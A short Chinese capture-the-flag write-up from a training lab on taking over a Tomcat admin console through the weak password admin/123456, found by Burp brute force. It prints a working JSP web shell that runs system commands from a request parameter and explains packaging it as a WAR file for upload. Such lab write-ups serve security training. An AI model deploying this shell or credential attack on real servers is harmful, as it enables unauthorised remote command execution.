天天看点

(墨者学院)Tomcat后台弱口令漏洞利用

第一部:随便点击靶机链接,跳出一个登录界面,因为题目提示网站后台账号密码存在弱口令,用burpsuite爆破得到账号密码为:admin/123456

(墨者学院)Tomcat后台弱口令漏洞利用

第二步:登录进去过后,发现有一个上传界面,所以直接上传一个war木马即可:

(墨者学院)Tomcat后台弱口令漏洞利用

这里先普及下war木马的制作过程:

1.找到一个jsp的小马(我这里先用我使用的jsp木马做例子)

<%
    if("023".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
%>
           

2.将自己的jsp木马放入 \jdk1.8.0_73\bin 目录下,然后在cmd输出已下命令(注意是必须在java环境下的)

(墨者学院)Tomcat后台弱口令漏洞利用

jar cvf  +部署的war木马 +自己bin目录下的jsp木马

3.输出成功后的war木马在bin目录下,将木马上传至网站即可。

第三步:

(墨者学院)Tomcat后台弱口令漏洞利用

第四步:发现文件key_1528659474576.php,直接cat key_1528659474576.php

(墨者学院)Tomcat后台弱口令漏洞利用

直接查看源代码就可以看见key值了